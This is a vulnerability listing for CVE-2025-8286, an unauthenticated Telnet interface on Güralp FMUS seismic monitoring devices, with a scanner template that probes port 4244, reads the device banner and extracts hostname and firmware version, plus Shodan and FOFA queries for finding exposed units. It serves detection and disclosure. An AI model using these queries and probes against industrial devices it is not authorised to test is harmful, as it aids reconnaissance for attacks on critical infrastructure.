CVE-2025-8286: Güralp Systems FMUS Series - Unauthenticated Access

Date: 2025-08-01 | Affected software: Güralp Systems FMUS Series | PoC: Public

Vulnerability Description

Güralp Systems FMUS Series Seismic Monitoring Devices expose an unauthenticated Telnet-based command line interface that allows attackers to modify hardware configurations, manipulate data, or factory reset the device.

PoC Code [Public]

id: CVE-2025-8286

info:
  name: Güralp Systems FMUS Series - Unauthenticated Access
  severity: critical
  author: darses
  description: |
    Güralp Systems FMUS Series Seismic Monitoring Devices expose an unauthenticated Telnet-based command line interface that allows attackers to modify hardware configurations, manipulate data, or factory reset the device.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to modify hardware configurations, manipulate data, or factory reset the device.
  reference:
    - https://www.cisa.gov/news-events/ics-advisories/icsa-25-212-01
    - https://www.cve.org/CVERecord?id=CVE-2025-8286
  remediation: |
    Update to the latest firmware version or apply vendor recommended patches to secure Telnet access.
  classification:
    cwe-id: CWE-306
    cve-id: CVE-2025-8286
    epss-score: 0.02215
    epss-percentile: 0.8389
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
  metadata:
    verified: true
    vendor: guralp_systems
    product: fmus_series_seismic_monitoring_devices
    shodan-query: '"Welcome to " "list of available commands" port:4244'
    fofa-query: '"Welcome to " && "list of available commands" && port="4244"'
  tags: cve,cve2025,tcp,network,telnet,guralp,ics

tcp:
  - host:
      - "{{Hostname}}"

    port: 4244

    inputs:
      - data: "\n"
        read: 256
        name: banner

      - data: "system info\n"
        read: 256
        name: system_info

    matchers-condition: and
    matchers:
      - type: word
        part: banner
        words:
          - "Welcome to "
          - 'type "help" for a list of available commands'
        condition: and

      - type: word
        part: system_info
        words:
          - "Host Name: "
          - "Firmware Version: "
        condition: and

    extractors:
      - type: regex
        part: system_info
        group: 1
        regex:
          - "Host\\s+Name:\\s+([\\w\\d\\.\\-]+)"

      - type: regex
        part: system_info
        group: 1
        regex:
          - "Firmware\\s+Version:\\s+([\\d\\.\\-]+)"
# digest: 4a0a00473045022011dc1ef952f9d02953f241ab7927bb96917000c4bb39fcae3675efd71efe7554022100a30dd91ae448daff65544c3cd3b681d01de353b59cb41669c35cf4306d697b7e:922c64590222798bb761d5b6d8e72950